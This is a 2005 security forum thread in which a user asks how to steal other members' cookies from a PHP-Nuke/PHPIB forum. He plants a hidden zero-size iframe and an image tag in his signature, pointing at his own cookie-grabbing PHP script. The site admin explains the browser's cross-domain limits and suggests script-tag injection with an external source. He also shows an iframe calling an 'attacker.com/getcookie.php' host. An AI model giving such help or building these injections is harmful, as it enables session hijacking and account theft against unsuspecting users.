|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 78
Members: 0
Total: 78
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
problem in stealing cookies with iframe - please help! |
|
Posted: Wed Jul 13, 2005 11:56 am |
|
|
eli5050 |
Beginner |
|
|
Joined: Jul 13, 2005 |
Posts: 4 |
|
|
|
|
|
|
|
I built a script that takes all the cookies and saves them, and I hosted that script on my server.
here is the code:
edit: I deleted the code because it is not important to the answer
now, I entered some PHPIB forum (with php-nuke), and I found that html can be written in the signature, so I made an Iframe (0*0 Very Happy ) in my forum signature to the evil script. (by the way - javascript code is not working in the signature)
the problem is, that when the script ran he did not take the phpnuke with phpib site cookies, but it stole cookies from my server (beacause the script hosted in it).
can anyone help and find a solution that will solve the problem and make the script take the cookies from the site with the iframe and not from my site?? |
|
Last edited by eli5050 on Wed Jul 13, 2005 5:50 pm; edited 1 time in total |
|
|
|
|
|
|
|
Posted: Wed Jul 13, 2005 12:34 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
This is result of webbrowser security measures against cross-site and/or cross-domain scripting.
If you have iframe inside some webpage, then IF that iframe is hosted on other domain - you cant access parent page html code and other stuff, like cookies.
But if you can inject to target page html code something like this:
<script type=text/javascript src=xxx.com></script>
... then this javasript can do anything you want and browser will not apply any restrictions. |
|
|
|
|
|
thanks! |
|
Posted: Wed Jul 13, 2005 12:41 pm |
|
|
eli5050 |
Beginner |
|
|
Joined: Jul 13, 2005 |
Posts: 4 |
|
|
|
|
|
|
|
but the script code is in php, do you think it will work? |
|
|
|
|
Posted: Wed Jul 13, 2005 12:46 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
As i can understand, you have something like:
Code: |
<html>
<body>
...
....
<iframe src=http://attacker.com/getcookie.php></iframe>
...
...
</body>
</html>
|
All the stuff inside that iframe will be restricted by cross-domain security barriers. |
|
|
|
|
Posted: Wed Jul 13, 2005 1:31 pm |
|
|
eli5050 |
Beginner |
|
|
Joined: Jul 13, 2005 |
Posts: 4 |
|
|
|
|
|
|
|
I already told you I cant use scripts in my signature, if I write <script> then users see it as usual word and it is not with code. so I tried the following thing, instead "script I tried "img":
Code: | <img width = "0" height = "0" type="text/javascript" src="http://mysite/1.php"/> |
and when I entered to a message that I wrote, my signature ran the script - but...
the cookie that was sent was from the server that stores the script and not the server I want...
where did I wrong?
could you please tell me or find some othe way to run the script? |
|
|
|
|
www.waraxe.us Forum Index -> PhpNuke
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|